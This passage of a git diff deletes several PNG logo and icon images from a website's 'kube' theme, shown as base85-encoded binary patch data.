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

diff --git a/website/src/themes/kube/static/img/common/logo.png b/website/src/themes/kube/static/img/common/logo.png
deleted file mode 100644
index 519c20816dc09e5846d3012ae49d63ae640b4d1a..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1462
zcmV;n1xfmeP)<h;3K|Lk000e1NJLTq002z@001)x1^@s6(jkQb00001b5ch_0Itp)
z=>Px#1ZP1_K>z@;j|==^1poj532;bRa{vGi!~g&e!~vBn4jTXf1xrapK~!i%?V4Li
zR8JhoC-H`8D0qD-B@{soNwmNaQCvh2Qw&kkE<Q*^8r@6<AH1U?C1T-&ZIC@giin6p
z;3dI8%M0FK3?K4IA4Ob)PV@UUyPe%L=d?R5{g;39fiH9B_nSGp``t4)-BW}Rg-YTA
zUaXY3fHX}2X_^4iGy$Y(0!Y&YkfsSBO%p(xCV(_e0BM>4(li02X##k(X}-R`Bs4UX
z)jS7X)68ZwxpL(Ss~L0k>Qyo^F+t9qJI5mKp}xMJ?C<Zhn&+Tv+V$(#iOFPQHGOX1
zzD?e~eM>%k_&|1cc39Ls93CFBE6>7kcpe`gvnxJNo;)G_{r#l8yqvVRx3lQ~AK^Kz
zrKJUp%FoXyuV24r(SHLW)1E$kN*Wp(NJd5m86O{K(SHY*O@jrZrly8mxNrgIv40Vl
zOndk49WD@YadBjMd6`A^xpU_ZNlZ*+HGT5(@|;?!y}Z0gQ&SUuSxZYx<jtEmBqt|_
zWq;4DTeomzz<Zyaoy94}-`}5QT?76br4i86(_^boO-*4eDk{pZosodX#zt;VE&3sp
z-Q8VH{Nclgcn`RK_Usv6udJ*nbS_moIy#h@nHh}HRaVnit-``WYzMq}@j{^s81~=W
z+rt>$+Hm_Bh#SP4b$55;_5A!i)`NqCHSLT9JbwI`n^S9UZcbTSThqj?roDXm5=(Dy
zZ%rGJ#bUucFGoiP<|->Ix%te@Ow3=qc8#0Y5jTi8f)D)u{d>HoyK`<kBLRP6+Wq_Y
z@gCp5f7j$31+=xbapRqxotn5>bjV{nUQS2cAl}3ZFYk;1cbG=!MNQ68&!0cXw(1xR
zL&un&06IT%bB;1x2*$?7uzdCE6_$USQ>Wku0EDcsuVZP%;NT#Zk&%&D0;Q#;gnk*U
zX3Wvi5$-vi!O%2VWrBi&NJT}(e`1`~G-rU-6i7`?#S%Dw{yd=z7^@kxxVT7?l9E`>
z7(>%epFWM}KRAekadbjv8PDVAD71gl0J?JGh?$(6)Ya(dD7k$3GKq+YV7-iSYM=Jy
z%NG(KA5U)FxPfO)PsYc`hh6>T;NXC4Zf=t8?QLDr?GB+^8q(X_%X<AD%|r(R)cZ70
zLP7$@VXvc(>j`-D=n*%k7TstXZaEy|dIHMI%IxZ`t*v%#+##1v1REP0Bqb$<R8>{s
z`O_JknU~;?jr8-e+Anx9J<gmtgC#swR=$4yN-kc!$ZGDxCDVY<pFfkdv@|?_(kGEc
z^$8CTXIJ`Mx^#)0oSd-QFI+Lry7JKz1C{{HRoU6utma;9kDXe8<M31~Jv|-Ubai!c
z^Ptt$RpryCPu!eUb#--kpN}6uYI4?n+Q7hoCg&*F08dX(+r`4d!mxjFaj{+84dMpz
z#f(e?Wo2byJ2=Pj^3~PVnCIm{B_$=8hf@cfDIN0<9z4K20QYjtTScb|Y!et5sL73t
zj9@M#Bt(<@195}+LU2gt<<v5nOxRZMsA45IH`f-6iHWhDXW@7@JUpyyZEe~01J%~n
zVjH*ypiOdevMo<nbY)>-0dsVC+TxC)Qwp}}>+4g_o;_=qi;ay{nwy)suWul35MQLF
zrG=YwR8dh8w!e4p9yf12zp8;Jz?vT#8bTA*eL#2b-c`PR`(~?~&1Tm77dtyUN_2Fz
zT|b@*3JMguFtA?s(8WW!dGjW>A5VYvhsu6_epp&87A!@9zpDiV1PK4*1@?0AUPSxL
zUv~@O@|Hs)O%p<zCV(_e0BM>4(li02X#z;o1dyf)AWaiMnkIlW&1DGr0Ta16PCo9y
QlmGw#07*qoM6N<$g17dsod5s;

diff --git a/website/src/themes/kube/static/img/common/logx2.png b/website/src/themes/kube/static/img/common/logx2.png
deleted file mode 100644
index 174cd3f7a0b8f55608ff7d32970776996996c772..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 2384
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
CA!S$q

diff --git a/website/src/themes/kube/static/img/icon-minimalism.png b/website/src/themes/kube/static/img/icon-minimalism.png
deleted file mode 100644
index f0961ab68ba5c2fdb61f556285c4d322c15a493c..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1753
zcmeAS@N?(olHy`uVBq!ia0vp^1|ZDA1|-9oezpTC$r9IylHmNblJdl&R0hYC{G?O`
z&)mfH)S%SFl*+=BsWuD@%o>>?5hW46K32*3xq68pHF_1f1wh>l3^w)^1&PVosU-?Y
zsp*+{wo31J?^jaDOtDo8H}y5}EpSfF$n>ZxN)4{^3rViZPPR-@vbR&PsjvbXkegbP
zs8ErclUHn2VXFi-*9yo63F|8<fR&VF+bTgE72zA8;GAESs$i;TrkiYFX0Bjvsb^?v
zZf;_(qhMrUXsT~utZ!_fYh-L?Vqj%rqyPm<K--E^(yW49+@N*=dA3R!B_#z``ugSN
z<$C4Ddih1^`i7R4mih)p`bI{&Koz>hm3bwJ6}oxF$}kgLQj3#|G7CyF^YauyCMG83
zmzLNn0bL65LT&-v*t}wBFaZNhzap_f-%!s0<RzFwUtj!6b93RUi%Wu15$?rmaB)aw
zL8^XGYH@yPQ8F;%(v(3~6<9eJr6!i-7lq{K=fFZSAS1sdzc?emK*8A=9BK+0zKO}1
zc_2Yeur6O;E6=>*lEl2^R8JRMC7?NanVBh8P8N<97RFA7Ms7~VhK8<Yjs_;?PDbVy
zMrP(tCgz52FugAM$)&lec_lEtDG0qrIQ4=OL~a4lW|!2W%(B!Jx1#)91+d4hGI6@a
z(G910P`xR*-C}@KuRhQ*`k?4Vif)(?Fb#p2@Wcz`z>|M!9x%-p0TcIDFP+E0Jmc=^
z;uunK>q*po?+{0kd9xR3&)&Ul)9rmCA`&7ge;NNa7zuj6NLADjSfZ|d;={oM=KmQE
zPk;5FLy*fQcO$#5_l2@j?TI=~4zC;|x89cg<K}-mtNi=F8<JKZ42#mAo%#ND&P?m#
zbxsm_)7<O$g!CAea~|j5bh3R_FSJk4PVk=KF;3x%IK$P7OE}JRR5rybeR?swX}v?|
zeMKEZBk2~CM241GhRlfyjp>?OJQw%B+Rrk7ANNk5it}vqRPU%BIsHM@{eI*#|6h3@
zn=5n^Cw$;$J}bDcdP|$mk6F$6mdBKPUUr_0e<eC+y|CObldG4~<&SMJOuMu8^5PaA
znL3p@ya~N04eb)nR2~vE-~We6X0M_O^Bs*z5|`Q9D=aTta<Ut@WUy{~sUd6_nRSD2
zVe+|di;|uHiXIp}*%HiM*7UU@>E6j%5zNcA{kC~;&8RlD`t+qK_*wkz*S6o9R$cON
z5Iq-QX7O%k!SstOoDVmrv+vM-zjZ<WhS=km0vcHJ%y#@sJ-p)0wI4t3^Y$HX6&0Mr
z_f*h)*~SJ5i#(BivqNfnr3*NvAHV*>AUDt1GOM8>@LVLPMQhP92F85Lbkzqer+OHf
zHfhZMaX9oy=we1Dse@nH>sPER*~-STBC)32se{|_=%<*5S$$Q^9iL+^_cg57;Fnf#
zDExDdRY&ZNo7L=FwPHIODyN)f<FGhvsm&;?p)U!Pt~n`hCSX?B+mqpA$J96b!Jqct
z1nIYzA{@jm`b1XmX+5Rc%j(no_-xWt#Y0?DTe3X%iQchm&JKK?c>PpX?+I@`t&>+b
z#~&8B$GPbtb1%yZ`Le?O@$r$?Qm0cU`E}|_-;ueQ{7`A*tA!s~K2Hv^YKu5?(x!F?
z)04wV-*+F$R$myL!MV&%wqTo5n_;Z`!NQHRWzTgzuq#;czQD4eAl365)5PwV`~0JG
zOlwxNTI<^US)ug!z2@#yC%;~Nrufrr+q0Y=(ND=$w<A4PCLhlYyeB?K<CmXd{iW}r
z`;)i$<vf2Ke&ayVt$2Z7oYxCpTBvLj-X!)f&neda*1C=V;va0*JCW<>SE&BbGSPd=
zzx8a<FK)k7i`nC~_;k!!*F%+uJY#&NZ_KO}J@H6QRX-s4Row6R+xd)a41zj;`6D;}
Q^Z->hp00i_>zopr0N1adbN~PV

diff --git a/website/src/themes/kube/static/img/icon-typo.png b/website/src/themes/kube/static/img/icon-typo.png
deleted file mode 100644
index 083b5b41d850ab7496b5f3dd5b7dd0cbf4e0b3b5..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1133
zcmaJ>TWHfz7>-kiZeBoSY8fL$8B^9IO}nOzi(A{Qu4qQ7bsLCimYl6&CMPCmHXDdz
zQ`84xh`xvqQ$c-EL_sD>RrWLxA4N71^uei!7i5Yc>PcOv57q<8Ip^p5zW<t>Om}Qw
zS>>xD2x4WbUCQ8{^`2#w_}x|U?Ks{xptf$b3-+SCVgn+k!5%=S45bfbfT9f^oC3`R
zvA99ccB5{2r=UWERy+*t8Wv^~M01O4DQZ7JWDn@mO_BO=_dZ4Hnn-mu$*gQ8Ku&KT
zvcayQj;uP=uSPYhWgFS-3Ru7ZNFiP0fawUXNELMjeD=%?MHV5bU!;Bq)h(yV1hfI!
zM2Gz<8|FzqN(Y*FKEyYY92;n2*dP;R{ajE8u|kL==NE;&*;=oVk&^Si@J*z02w4Kd
z<nwttAEcq(#{{C$D8q6L$N4eB?+ltqas8&Vv7{gYN40ee>ChxSMWqK0Ad$k6{!YQL
z7GzClzD&4ajH_5ofM&gvN<dluKh!W5&<@IgKk@!k*vSrBfXM&{4%jMgT<=EDl_ex>
zpde^xAv{p3Vmb#AbaK!l6NzHg$Oc(ab<;C$F0y1<NSO{&OckUgk-|E(u4_U(5{pEF
zF^NmYgMmO>IL3zfILAl0Fdq-`fn<p*L3O|YCMt2YKisymTyG!@3wxG;tseqf(uM|E
zOkB{*#}Y5AH_z3|$C4<^WpFTz*WSO{T{7Vr@{S9`i!Te~4@^AsHXiQCsuL9cFlJIx
zEbC6cJ1166vMY{VdU<Vhru9|L(9c`w?X$6JG<AJ?|2lO#{d37CcXeI;_;8^;>5D&V
z&OK4m^c+!tn4~@}pY_9VPuJ|Fv3vU-tEp;v<n&iz>&%+r{>X>IE#LPyk1Jblp8ruX
zanz~#I5+DXUjKb9apUOc&c)+}inohut`VK-r7y+WBOSM2@4Qks8l2euWl!Pxnfk)y
zmWNZdPr=y-Vejwo?=>F3{9^C>+8tM0FD%QC=a+_l+__k&fQu@L#<}PzpHl7jc&WAy
J>3V$s$S+F#Zzcc$

diff --git a/website/src/themes/kube/static/img/kube/brand.png b/website/src/themes/kube/static/img/kube/brand.png
deleted file mode 100644
index 15ab15e47aad7df1ec102c0f14155b7985f809f1..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1848
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
K;j*QxbN&Ih!pb@T

diff --git a/website/src/themes/kube/static/img/kube/icon-baseline.png b/website/src/themes/kube/static/img/kube/icon-baseline.png
deleted file mode 100644
index e7de5d910449ab457c58e6316fdc4c41524f29b8..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1024
zcmaJ=O=#0#7>*kb85?+zp*zTDc9~%F*Pk?D-AJ3(l`V60mG$6ZY4UZAUGl}`tIc|t
zKNk_E2f_0Y6))m#7X|ey2zn3&Pr`00h@ygs;+M9m9ySB{eqNsEeV_N|ySlh=a&&ln
zn4+lB;;dRCI~V>3hRC`+@Z$>Ej^KO+FQFQ4=^msM6ICH7+WIOiLET(G_Y6)^)ZnC5
zuHcF`FB`~a^bo@YwoBL)H8m5sy3v3bRN<=SWav+ip3uNDGxTy&<1{x1>(*@BgG=p&
zve9lBl1a}@gQ-9!4s3{Z5ZG&uF9#XA<5wo<(9F`H1Hp|9-4#{Q7C{bq5G0vY%-~WY
z5G96Bief@M0R)auvRs^vb1@+<CpbAFfZj)wXr5V<OKPDPi`+7F9b;E!*;cE?wBii%
zR#{$>B$g9cL5LAV%wKn~9>g4fBJ!X@-|#FKTgU;SN4<)gI71Vq-4txM@7D2qWg-P*
z1KnkLh6_`QfSUGysBQPrJ}$w(dUti~m)Bj$mY|QCo<SN{n+QX>a?XP~MqU}AwWx}V
zb%c>$M=r?aI#mOcnr>K5XguCwX_{Pge5^YLEUFor_+c!|l=);{N#`X+C@4J7=Ti!o
z5VL}q7E)q1A@YTYt0JRmLkCA(lW?<XC7q5dgqw};$_)p?c1dIvde(Vp7CdBwPU5n)
zx0dwYTDn|w7cIR!q&>MT5yOV<{iofLiOf)V><=%w^v54MWad3G+?(P^_{yB3s+5Db
zAK&o97rBxBFE>8_UcR0_^h$Yn^Zn1ITXRRPW5v_kjT>KgepNTV-2e9c_1KGPdh5*2
zhq=n*!Oq(v%Y~uM`P+8~zwg^R+%-K-oE=YIYiA?C_e-am?+&g|_r^wR<J)%zLVGd4
Kpgzd1T>b-|+&*Fe

diff --git a/website/src/themes/kube/static/img/kube/icon-minimalism.png b/website/src/themes/kube/static/img/kube/icon-minimalism.png
deleted file mode 100644
index f0961ab68ba5c2fdb61f556285c4d322c15a493c..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1753
zcmeAS@N?(olHy`uVBq!ia0vp^1|ZDA1|-9oezpTC$r9IylHmNblJdl&R0hYC{G?O`
z&)mfH)S%SFl*+=BsWuD@%o>>?5hW46K32*3xq68pHF_1f1wh>l3^w)^1&PVosU-?Y
